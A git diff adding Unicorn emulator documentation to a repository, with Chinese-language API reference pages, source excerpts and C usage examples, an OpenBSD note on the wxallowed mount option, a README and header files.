*hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...) 
+{ + int ret = UC_ERR_OK; + int i = 0; + + struct hook *hook = calloc(1, sizeof(struct hook)); + if (hook == NULL) { + return UC_ERR_NOMEM; + } + + hook->begin = begin; + hook->end = end; + hook->type = type; + hook->callback = callback; + hook->user_data = user_data; + hook->refs = 0; + *hh = (uc_hook)hook; + + // UC_HOOK_INSN 有一个额外参数:指令ID + if (type & UC_HOOK_INSN) { + va_list valist; + + va_start(valist, end); + hook->insn = va_arg(valist, int); + va_end(valist); + + if (uc->insn_hook_validate) { + if (! uc->insn_hook_validate(hook->insn)) { + free(hook); + return UC_ERR_HOOK; + } + } + + if (uc->hook_insert) { + if (list_insert(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { + free(hook); + return UC_ERR_NOMEM; + } + } else { + if (list_append(&uc->hook[UC_HOOK_INSN_IDX], hook) == NULL) { + free(hook); + return UC_ERR_NOMEM; + } + } + + hook->refs++; + return UC_ERR_OK; + } + + while ((type >> i) > 0) { + if ((type >> i) & 1) { + if (i < UC_HOOK_MAX) { + if (uc->hook_insert) { + if (list_insert(&uc->hook[i], hook) == NULL) { + if (hook->refs == 0) { + free(hook); + } + return UC_ERR_NOMEM; + } + } else { + if (list_append(&uc->hook[i], hook) == NULL) { + if (hook->refs == 0) { + free(hook); + } + return UC_ERR_NOMEM; + } + } + hook->refs++; + } + } + i++; + } + + if (hook->refs == 0) { + free(hook); + } + + return ret; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include <string> +#include "unicorn/unicorn.h" +using namespace std; + +int syscall_abi[] = { + UC_X86_REG_RAX, UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX, + UC_X86_REG_R10, UC_X86_REG_R8, UC_X86_REG_R9 +}; + +uint64_t vals[7] = { 200, 10, 11, 12, 13, 14, 15 }; + +void* ptrs[7]; + +void uc_perror(const char* func, uc_err err) +{ + fprintf(stderr, "Error in %s(): %s\n", func, uc_strerror(err)); +} + +#define BASE 0x10000 + +// mov rax, 100; mov rdi, 1; mov rsi, 2; mov rdx, 3; mov r10, 4; mov r8, 5; mov r9, 6; syscall +#define CODE 
"\x48\xc7\xc0\x64\x00\x00\x00\x48\xc7\xc7\x01\x00\x00\x00\x48\xc7\xc6\x02\x00\x00\x00\x48\xc7\xc2\x03\x00\x00\x00\x49\xc7\xc2\x04\x00\x00\x00\x49\xc7\xc0\x05\x00\x00\x00\x49\xc7\xc1\x06\x00\x00\x00\x0f\x05" + +void hook_syscall(uc_engine* uc, void* user_data) +{ + int i; + + uc_reg_read_batch(uc, syscall_abi, ptrs, 7); + + printf("syscall: {"); + + for (i = 0; i < 7; i++) { + if (i != 0) printf(", "); + printf("%" PRIu64, vals[i]); + } + + printf("}\n"); +} + +void hook_code(uc_engine* uc, uint64_t addr, uint32_t size, void* user_data) +{ + printf("HOOK_CODE: 0x%" PRIx64 ", 0x%x\n", addr, size); +} + +int main() +{ + int i; + uc_hook sys_hook; + uc_err err; + uc_engine* uc; + + for (i = 0; i < 7; i++) { + ptrs[i] = &vals[i]; + } + + if ((err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc))) { + uc_perror("uc_open", err); + return 1; + } + + printf("reg_write_batch({200, 10, 11, 12, 13, 14, 15})\n"); + if ((err = uc_reg_write_batch(uc, syscall_abi, ptrs, 7))) { + uc_perror("uc_reg_write_batch", err); + return 1; + } + + memset(vals, 0, sizeof(vals)); + if ((err = uc_reg_read_batch(uc, syscall_abi, ptrs, 7))) { + uc_perror("uc_reg_read_batch", err); + return 1; + } + + printf("reg_read_batch = {"); + + for (i = 0; i < 7; i++) { + if (i != 0) printf(", "); + printf("%" PRIu64, vals[i]); + } + + printf("}\n"); + + // syscall + printf("\n"); + printf("running syscall shellcode\n"); + + if ((err = uc_hook_add(uc, &sys_hook, UC_HOOK_CODE, hook_syscall, NULL, 1, 0))) { + uc_perror("uc_hook_add", err); + return 1; + } + + if ((err = uc_mem_map(uc, BASE, 0x1000, UC_PROT_ALL))) { + uc_perror("uc_mem_map", err); + return 1; + } + + if ((err = uc_mem_write(uc, BASE, CODE, sizeof(CODE) - 1))) { + uc_perror("uc_mem_write", err); + return 1; + } + + if ((err = uc_emu_start(uc, BASE, BASE + sizeof(CODE) - 1, 0, 0))) { + uc_perror("uc_emu_start", err); + return 1; + } + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/aU1lbmxMjXA5g3K.png) + +对每条指令都进行hook + + + +### uc_hook_del + +``` 
+uc_err uc_hook_del(uc_engine *uc, uc_hook hh); +``` + +删除一个已注册的hook事件 + +``` +@uc: uc_open() 返回的句柄 +@hh: uc_hook_add() 返回的句柄 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_hook_del(uc_engine *uc, uc_hook hh) +{ + int i; + struct hook *hook = (struct hook *)hh; + + for (i = 0; i < UC_HOOK_MAX; i++) { + if (list_remove(&uc->hook[i], (void *)hook)) { + if (--hook->refs == 0) { + free(hook); + break; + } + } + } + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp +if ((err = uc_hook_add(uc, &sys_hook, UC_HOOK_CODE, hook_syscall, NULL, 1, 0))) { + uc_perror("uc_hook_add", err); + return 1; +} + +if ((err = uc_hook_del(uc, &sys_hook))) { + uc_perror("uc_hook_del", err); + return 1; +} +``` + + + +### uc_mem_map + +```c +uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); +``` + +为模拟映射一块内存。 + +``` +@uc: uc_open() 返回的句柄 +@address: 要映射到的新内存区域的起始地址。这个地址必须与4KB对齐,否则将返回UC_ERR_ARG错误。 +@size: 要映射到的新内存区域的大小。这个大小必须是4KB的倍数,否则将返回UC_ERR_ARG错误。 +@perms: 新映射区域的权限。参数必须是UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC或这些的组合,否则返回UC_ERR_ARG错误。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms) +{ + uc_err res; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + res = mem_map_check(uc, address, size, perms); //内存安全检查 + if (res) + return res; + + return mem_map(uc, address, size, perms, uc->memory_map(uc, address, size, perms)); +} +``` + +使用示例同uc_hook_add。 + + + +### uc_mem_map_ptr + +```c +uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr); +``` + +在模拟中映射现有的主机内存。 + +``` +@uc: uc_open() 返回的句柄 +@address: 要映射到的新内存区域的起始地址。这个地址必须与4KB对齐,否则将返回UC_ERR_ARG错误。 +@size: 要映射到的新内存区域的大小。这个大小必须是4KB的倍数,否则将返回UC_ERR_ARG错误。 +@perms: 新映射区域的权限。参数必须是UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC或这些的组合,否则返回UC_ERR_ARG错误。 +@ptr: 指向支持新映射内存的主机内存的指针。映射的主机内存的大小应该与size的大小相同或更大,并且至少使用PROT_READ | 
PROT_WRITE进行映射,否则不定义映射。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr) +{ + uc_err res; + + if (ptr == NULL) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + res = mem_map_check(uc, address, size, perms); //内存安全检查 + if (res) + return res; + + return mem_map(uc, address, size, UC_PROT_ALL, uc->memory_map_ptr(uc, address, size, perms, ptr)); +} +``` + +使用示例同uc_mem_map + + + +### uc_mem_unmap + +```c +uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size); +``` + +取消对模拟内存区域的映射 + +``` +@uc: uc_open() 返回的句柄 +@address: 要映射到的新内存区域的起始地址。这个地址必须与4KB对齐,否则将返回UC_ERR_ARG错误。 +@size: 要映射到的新内存区域的大小。这个大小必须是4KB的倍数,否则将返回UC_ERR_ARG错误。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_unmap(struct uc_struct *uc, uint64_t address, size_t size) +{ + MemoryRegion *mr; + uint64_t addr; + size_t count, len; + + if (size == 0) + // 没有要取消映射的区域 + return UC_ERR_OK; + + // 地址必须对齐到 uc->target_page_size + if ((address & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // 大小必须是 uc->target_page_size 的倍数 + if ((size & uc->target_page_align) != 0) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + // 检查用户请求的整个块是否被映射 + if (!check_mem_area(uc, address, size)) + return UC_ERR_NOMEM; + + // 如果这个区域跨越了相邻的区域,可能需要分割区域 + addr = address; + count = 0; + while(count < size) { + mr = memory_mapping(uc, addr); + len = (size_t)MIN(size - count, mr->end - addr); + if (!split_region(uc, mr, addr, len, true)) + return UC_ERR_NOMEM; + + // 取消映射 + mr = memory_mapping(uc, addr); + if (mr != NULL) + uc->memory_unmap(uc, mr); + count += len; + addr += len; + } + + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp +if ((err = uc_mem_map(uc, BASE, 0x1000, UC_PROT_ALL))) { + uc_perror("uc_mem_map", err); + return 1; +} + +if ((err = uc_mem_unmap(uc, BASE, 0x1000))) { + 
uc_perror("uc_mem_unmap", err); + return 1; +} +``` + + + +### uc_mem_protect + +```c +uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); +``` + +设置模拟内存的权限 + +``` +@uc: uc_open() 返回的句柄 +@address: 要映射到的新内存区域的起始地址。这个地址必须与4KB对齐,否则将返回UC_ERR_ARG错误。 +@size: 要映射到的新内存区域的大小。这个大小必须是4KB的倍数,否则将返回UC_ERR_ARG错误。 +@perms: 映射区域的新权限。参数必须是UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC或这些的组合,否则返回UC_ERR_ARG错误。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_protect(struct uc_struct *uc, uint64_t address, size_t size, uint32_t perms) +{ + MemoryRegion *mr; + uint64_t addr = address; + size_t count, len; + bool remove_exec = false; + + if (size == 0) + // trivial case, no change + return UC_ERR_OK; + + // address must be aligned to uc->target_page_size + if ((address & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // size must be multiple of uc->target_page_size + if ((size & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // check for only valid permissions + if ((perms & ~UC_PROT_ALL) != 0) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + // check that user's entire requested block is mapped + if (!check_mem_area(uc, address, size)) + return UC_ERR_NOMEM; + + // Now we know entire region is mapped, so change permissions + // We may need to split regions if this area spans adjacent regions + addr = address; + count = 0; + while(count < size) { + mr = memory_mapping(uc, addr); + len = (size_t)MIN(size - count, mr->end - addr); + if (!split_region(uc, mr, addr, len, false)) + return UC_ERR_NOMEM; + + mr = memory_mapping(uc, addr); + // will this remove EXEC permission? 
+        if (((mr->perms & UC_PROT_EXEC) != 0) && ((perms & UC_PROT_EXEC) == 0))
+            remove_exec = true;
+        mr->perms = perms;
+        uc->readonly_mem(mr, (perms & UC_PROT_WRITE) == 0);
+
+        count += len;
+        addr += len;
+    }
+
+    // if EXEC permission is removed, then quit TB and continue at the same place
+    if (remove_exec) {
+        uc->quit_request = true;
+        uc_emu_stop(uc);
+    }
+
+    return UC_ERR_OK;
+}
+```
+
+使用示例:
+
+```cpp
+if ((err = uc_mem_protect(uc, BASE, 0x1000, UC_PROT_ALL))) { //可读可写可执行
+    uc_perror("uc_mem_protect", err);
+    return 1;
+}
+```
+
+
+
+### uc_mem_regions
+
+```c
+uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count);
+```
+
+检索由 uc_mem_map() 和 uc_mem_map_ptr() 映射的内存的信息。
+
+这个API为@regions分配内存,用户之后必须通过free()释放这些内存来避免内存泄漏。
+
+```
+@uc: uc_open() 返回的句柄
+@regions: 指向 uc_mem_region 结构体的数组的指针. 由Unicorn申请,必须通过uc_free()释放这些内存
+@count: 指向@regions中包含的uc_mem_region结构体的数量的指针
+
+@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型
+```
+
+源码分析
+
+```c
+uint32_t uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count)
+{
+    uint32_t i;
+    uc_mem_region *r = NULL;
+
+    *count = uc->mapped_block_count;
+
+    if (*count) {
+        r = g_malloc0(*count * sizeof(uc_mem_region));
+        if (r == NULL) {
+            // 内存不足
+            return UC_ERR_NOMEM;
+        }
+    }
+
+    for (i = 0; i < *count; i++) {
+        r[i].begin = uc->mapped_blocks[i]->addr;
+        r[i].end = uc->mapped_blocks[i]->end - 1;
+        r[i].perms = uc->mapped_blocks[i]->perms;
+    }
+
+    *regions = r;
+
+    return UC_ERR_OK;
+}
+```
+
+使用示例:
+
+```cpp
+#include <iostream>
+#include <string>
+#include "unicorn/unicorn.h"
+using namespace std;
+
+int main()
+{
+    uc_err err;
+    uc_engine* uc;
+
+    if ((err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc))) {
+        uc_perror("uc_open", err);
+        return 1;
+    }
+
+    if ((err = uc_mem_map(uc, BASE, 0x1000, UC_PROT_ALL))) {
+        uc_perror("uc_mem_map", err);
+        return 1;
+    }
+
+    uc_mem_region *region;
+    uint32_t count;
+
+    if ((err = uc_mem_regions(uc, &region, &count))) {
+        uc_perror("uc_mem_regions", err);
+        return 1;
+    
} + + cout << "起始地址: 0x" << hex << region->begin << " 结束地址: 0x" << hex << region->end << " 内存权限: " <<region->perms << " 已申请内存块数: " << count << endl; + + if ((err = uc_free(region))) { ////注意释放内存 + uc_perror("uc_free", err); + return 1; + } + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/kbrF7NdV6LDxnYI.png) + + + +### uc_free + +```c +uc_err uc_free(void *mem); +``` + +释放由 uc_context_alloc 和 uc_mem_regions 申请的内存 + +``` +@mem: 由uc_context_alloc (返回 *context), 或由 uc_mem_regions (返回 *regions)申请的内存 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_free(void *mem) +{ + g_free(mem); + return UC_ERR_OK; +} + +void g_free(gpointer ptr) +{ + free(ptr); +} +``` + +使用示例同uc_mem_regions + + + +### uc_context_alloc + +```c +uc_err uc_context_alloc(uc_engine *uc, uc_context **context); +``` + +分配一个可以与uc_context_{save,restore}一起使用的区域来执行CPU上下文的快速保存/回滚,包括寄存器和内部元数据。上下文不能在具有不同架构或模式的引擎实例之间共享。 + +``` +@uc: uc_open() 返回的句柄 +@context: 指向uc_engine*的指针。当这个函数成功返回时,将使用指向新上下文的指针更新它。之后必须使用uc_free()释放这些分配的内存。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_context_alloc(uc_engine *uc, uc_context **context) +{ + struct uc_context **_context = context; + size_t size = cpu_context_size(uc->arch, uc->mode); + + *_context = malloc(size + sizeof(uc_context)); + if (*_context) { + (*_context)->size = size; + return UC_ERR_OK; + } else { + return UC_ERR_NOMEM; + } +} +``` + +使用示例 + +```cpp +#include <iostream> +#include <string> +#include "unicorn/unicorn.h" +using namespace std; + +#define ADDRESS 0x1000 +#define X86_CODE32_INC "\x40" // INC eax + +int main() +{ + uc_engine* uc; + uc_context* context; + uc_err err; + + int r_eax = 0x1; // EAX 寄存器 + + printf("===================================\n"); + printf("Save/restore CPU context in opaque blob\n"); + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err) { + printf("Failed on uc_open() with error returned: %u\n", err); + return 0; + } + + uc_mem_map(uc, ADDRESS, 8 * 1024, 
UC_PROT_ALL); + + if (uc_mem_write(uc, ADDRESS, X86_CODE32_INC, sizeof(X86_CODE32_INC) - 1)) { + printf("Failed to write emulation code to memory, quit!\n"); + return 0; + } + + // 初始化寄存器 + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + + printf(">>> Running emulation for the first time\n"); + + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + printf(">>> Emulation done. Below is the CPU context\n"); + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + printf(">>> EAX = 0x%x\n", r_eax); + + // 申请并保存 CPU 上下文 + printf(">>> Saving CPU context\n"); + + err = uc_context_alloc(uc, &context); + if (err) { + printf("Failed on uc_context_alloc() with error returned: %u\n", err); + return 0; + } + + err = uc_context_save(uc, context); + if (err) { + printf("Failed on uc_context_save() with error returned: %u\n", err); + return 0; + } + + printf(">>> Running emulation for the second time\n"); + + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_INC) - 1, 0, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + printf(">>> Emulation done. Below is the CPU context\n"); + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + printf(">>> EAX = 0x%x\n", r_eax); + + // 恢复 CPU 上下文 + err = uc_context_restore(uc, context); + if (err) { + printf("Failed on uc_context_restore() with error returned: %u\n", err); + return 0; + } + + printf(">>> CPU context restored. 
Below is the CPU context\n"); + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + printf(">>> EAX = 0x%x\n", r_eax); + + // 释放 CPU 上下文 + err = uc_free(context); + if (err) { + printf("Failed on uc_free() with error returned: %u\n", err); + return 0; + } + + uc_close(uc); + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/juNPWvwGUlraKRh.png) + + + +### uc_context_save + +```c +uc_err uc_context_save(uc_engine *uc, uc_context *context); +``` + +保存当前CPU上下文 + +``` +@uc: uc_open() 返回的句柄 +@context: uc_context_alloc() 返回的句柄 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_context_save(uc_engine *uc, uc_context *context) +{ + struct uc_context *_context = context; + memcpy(_context->data, uc->cpu->env_ptr, _context->size); + return UC_ERR_OK; +} +``` + +使用示例同uc_context_alloc() + + + +### uc_context_restore + +```c +uc_err uc_context_restore(uc_engine *uc, uc_context *context); +``` + +恢复已保存的CPU上下文 + +``` +@uc: uc_open() 返回的句柄 +@context: uc_context_alloc() 返回并且已使用 uc_context_save 保存的句柄 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_context_restore(uc_engine *uc, uc_context *context) +{ + struct uc_context *_context = context; + memcpy(uc->cpu->env_ptr, _context->data, _context->size); + return UC_ERR_OK; +} +``` + +使用示例同uc_context_alloc() + + + +### uc_context_size + +```c +size_t uc_context_size(uc_engine *uc); +``` + +返回存储cpu上下文所需的大小。可以用来分配一个缓冲区来包含cpu上下文,并直接调用uc_context_save。 + +``` +@uc: uc_open() 返回的句柄 + +@return 存储cpu上下文所需的大小,类型为 size_t. +``` + +源码实现 + +```c +size_t uc_context_size(uc_engine *uc) +{ + return cpu_context_size(uc->arch, uc->mode); +} + +static size_t cpu_context_size(uc_arch arch, uc_mode mode) +{ + switch (arch) { +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: return M68K_REGS_STORAGE_SIZE; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: return X86_REGS_STORAGE_SIZE; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: return mode & UC_MODE_BIG_ENDIAN ? 
ARM_REGS_STORAGE_SIZE_armeb : ARM_REGS_STORAGE_SIZE_arm; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: return mode & UC_MODE_BIG_ENDIAN ? ARM64_REGS_STORAGE_SIZE_aarch64eb : ARM64_REGS_STORAGE_SIZE_aarch64; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: + if (mode & UC_MODE_MIPS64) { + if (mode & UC_MODE_BIG_ENDIAN) { + return MIPS64_REGS_STORAGE_SIZE_mips64; + } else { + return MIPS64_REGS_STORAGE_SIZE_mips64el; + } + } else { + if (mode & UC_MODE_BIG_ENDIAN) { + return MIPS_REGS_STORAGE_SIZE_mips; + } else { + return MIPS_REGS_STORAGE_SIZE_mipsel; + } + } +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: return mode & UC_MODE_SPARC64 ? SPARC64_REGS_STORAGE_SIZE : SPARC_REGS_STORAGE_SIZE; +#endif + default: return 0; + } +} +``` + +使用示例同uc_context_alloc() + + + diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/OPENBSD-NOTES.md b/ai_anti_malware/unicorn/unicorn-master/docs/OPENBSD-NOTES.md new file mode 100644 index 0000000..ab66566 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/OPENBSD-NOTES.md @@ -0,0 +1,69 @@ +## Circumventing OpenBSD 6.0's W^X Protections + +OpenBSD 6.0 and above enforces data-execution prevention (DEP or +W^X) by default, preventing memory from being mapped as +simultaneously writeable and executable (i.e., W|X). This causes +problems for Unicorn, if left in place. If you're seeing +errors like the following: +``` +/home/git/unicorn >> ./sample_arm +Emulate ARM code +zsh: abort (core dumped) ./sample_arm +``` +then W^X is likely the culprit. If we run it again with ktrace +and look at the output with kdump, we see that this is indeed +the issue: +``` + 82192 sample_arm CALL mmap(0,0x800000,0x7<PROT_READ|PROT_WRITE|PROT_EXEC>,0x1002<MAP_PRIVATE|MAP_ANON>,-1,0) + 82192 sample_arm PSIG SIGABRT SIG_DFL + 82192 sample_arm NAMI "sample_arm.core" +``` +Right now, we're in the /home filesystem. 
Let's look at its mount +options in /etc/fstab: +``` +1234abcdcafef00d.g /home ffs rw,nodev,nosuid 1 2 +``` +If we edit the options to include ```wxallowed```, appending +this after nosuid, for example, then we're golden: +``` +1234abcdcafef00d.g /home ffs rw,nodev,nosuid,wxallowed 1 2 +``` + +Note that this *does* diminish the security of your filesystem +somewhat, and so if you're particularly particular about such +things, we recommend setting up a dedicated filesystem for +any activities that require ```(W|X)```, such as unicorn +development and testing. + +In order for these changes to take effect, you will need to +reboot. + +_Time passes..._ + +Let's try this again. There's no need to recompile unicorn or +the samples, as (W^X) is strictly a runtime issue. + +First, we double check to see if /home has been mounted with +wxallowed: +``` +/home >> mount | grep home +/dev/sd3g on /home type ffs (local, nodev, nosuid, wxallowed) +``` +Okay, now let's try running that sample again... +``` +/home/git/unicorn/samples >> ./sample_arm +Emulate ARM code +>>> Tracing basic block at 0x10000, block size = 0x8 +>>> Tracing instruction at 0x10000, instruction size = 0x4 +>>> Emulation done. Below is the CPU context +>>> R0 = 0x37 +>>> R1 = 0x3456 +========================== +Emulate THUMB code +>>> Tracing basic block at 0x10000, block size = 0x2 +>>> Tracing instruction at 0x10000, instruction size = 0x2 +>>> Emulation done. Below is the CPU context +>>> SP = 0x1228 +``` +works fine. + diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/README.md b/ai_anti_malware/unicorn/unicorn-master/docs/README.md new file mode 100644 index 0000000..f80f57d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/README.md @@ -0,0 +1,17 @@ +Documention of Unicorn engine. + +* How to compile & install Unicorn. + + http://unicorn-engine.org/docs/ + +* Tutorial on programming with C & Python languages. 
+ + http://unicorn-engine.org/docs/tutorial.html + +* Compare Unicorn & QEMU + + http://unicorn-engine.org/docs/beyond_qemu.html + +* Micro Uncorn-Engine API Documentation in Chinese + + https://github.com/kabeor/Micro-Unicorn-Engine-API-Documentation diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.png b/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.png new file mode 100644 index 0000000..3e86b3c Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.txt b/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.txt new file mode 100644 index 0000000..3b6e96a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/unicorn-logo.txt @@ -0,0 +1,19 @@ + /\'. _,. + |:\ \. .'_/ + _.- |(\\ \ .'_.' + _.-' ,__\\ \\_),/ _/ + _:.' .:::::::.___ ,' + // ' ./::::::\<o\( + // /|::/ `"( \ + ;/_ / ::( `. `. + /_'/ | ::::\ `. \ + '// '\ :::':\_ _, ` _'- + / | '\.:/|::::.._ `-__ )/ + | | \;| \:( '.(_ \_) + | | \( \::. '-) + \ \ , '""""---. + \ \ \ , _.-...) + \ \/\. \:,___.-'..:::/ + \ |\\:,.\:::::'.::::/ + ` `:;::::'.::;::' + '":;:""' diff --git a/ai_anti_malware/unicorn/unicorn-master/include/list.h b/ai_anti_malware/unicorn/unicorn-master/include/list.h new file mode 100644 index 0000000..5699e0a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/list.h @@ -0,0 +1,33 @@ +#ifndef UC_LLIST_H +#define UC_LLIST_H + +#include "unicorn/platform.h" + +struct list_item { + struct list_item *next; + void *data; +}; + +struct list { + struct list_item *head, *tail; +}; + +// create a new list +struct list *list_new(void); + +// removed linked list nodes but does not free their content +void list_clear(struct list *list); + +// insert a new item at the begin of the list. +void *list_insert(struct list *list, void *data); + +// append a new item at the end of the list. 
+void *list_append(struct list *list, void *data); + +// returns true if entry was removed, false otherwise +bool list_remove(struct list *list, void *data); + +// returns true if the data exists in the list +bool list_exists(struct list *list, void *data); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/qemu.h b/ai_anti_malware/unicorn/unicorn-master/include/qemu.h new file mode 100644 index 0000000..0d7b5dd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/qemu.h @@ -0,0 +1,51 @@ +/* By Dang Hoang Vu <dang.hvu -at- gmail.com>, 2015 */ + +#ifndef UC_QEMU_H +#define UC_QEMU_H + +struct uc_struct; + +#define OPC_BUF_SIZE 640 + +#include "sysemu/sysemu.h" +#include "sysemu/cpus.h" +#include "exec/cpu-common.h" +#include "exec/memory.h" + +#include "qemu/thread.h" +#include "include/qom/cpu.h" + +#include "vl.h" + +// This two struct is originally from qemu/include/exec/cpu-all.h +// Temporarily moved here since there is circular inclusion. +typedef struct RAMBlock { + struct MemoryRegion *mr; + uint8_t *host; + ram_addr_t offset; + ram_addr_t length; + uint32_t flags; + char idstr[256]; + /* Reads can take either the iothread or the ramlist lock. + * Writes must take both locks. + */ + QTAILQ_ENTRY(RAMBlock) next; + int fd; +} RAMBlock; + +typedef struct { + MemoryRegion *mr; + void *buffer; + hwaddr addr; + hwaddr len; +} BounceBuffer; + +typedef struct RAMList { + /* Protected by the iothread lock. 
*/ + unsigned long *dirty_memory[DIRTY_MEMORY_NUM]; + RAMBlock *mru_block; + QTAILQ_HEAD(, RAMBlock) blocks; + uint32_t version; +} RAMList; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/uc_priv.h b/ai_anti_malware/unicorn/unicorn-master/include/uc_priv.h new file mode 100644 index 0000000..77773b7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/uc_priv.h @@ -0,0 +1,269 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ + +#ifndef UC_PRIV_H +#define UC_PRIV_H + +#include "unicorn/platform.h" +#include <stdio.h> + +#include "qemu.h" +#include "unicorn/unicorn.h" +#include "list.h" + +// These are masks of supported modes for each cpu/arch. +// They should be updated when changes are made to the uc_mode enum typedef. +#define UC_MODE_ARM_MASK (UC_MODE_ARM|UC_MODE_THUMB|UC_MODE_LITTLE_ENDIAN|UC_MODE_MCLASS \ + |UC_MODE_ARM926|UC_MODE_ARM946|UC_MODE_ARM1176|UC_MODE_BIG_ENDIAN) +#define UC_MODE_MIPS_MASK (UC_MODE_MIPS32|UC_MODE_MIPS64|UC_MODE_LITTLE_ENDIAN|UC_MODE_BIG_ENDIAN) +#define UC_MODE_X86_MASK (UC_MODE_16|UC_MODE_32|UC_MODE_64|UC_MODE_LITTLE_ENDIAN) +#define UC_MODE_PPC_MASK (UC_MODE_PPC64|UC_MODE_BIG_ENDIAN) +#define UC_MODE_SPARC_MASK (UC_MODE_SPARC32|UC_MODE_SPARC64|UC_MODE_BIG_ENDIAN) +#define UC_MODE_M68K_MASK (UC_MODE_BIG_ENDIAN) + +#define ARR_SIZE(a) (sizeof(a)/sizeof(a[0])) + +#define READ_QWORD(x) ((uint64)x) +#define READ_DWORD(x) (x & 0xffffffff) +#define READ_WORD(x) (x & 0xffff) +#define READ_BYTE_H(x) ((x & 0xffff) >> 8) +#define READ_BYTE_L(x) (x & 0xff) +#define WRITE_DWORD(x, w) (x = (x & ~0xffffffffLL) | (w & 0xffffffff)) +#define WRITE_WORD(x, w) (x = (x & ~0xffff) | (w & 0xffff)) +#define WRITE_BYTE_H(x, b) (x = (x & ~0xff00) | ((b & 0xff) << 8)) +#define WRITE_BYTE_L(x, b) (x = (x & ~0xff) | (b & 0xff)) + + +typedef struct ModuleEntry { + void (*init)(void); + QTAILQ_ENTRY(ModuleEntry) node; + module_init_type type; +} ModuleEntry; + +typedef QTAILQ_HEAD(, 
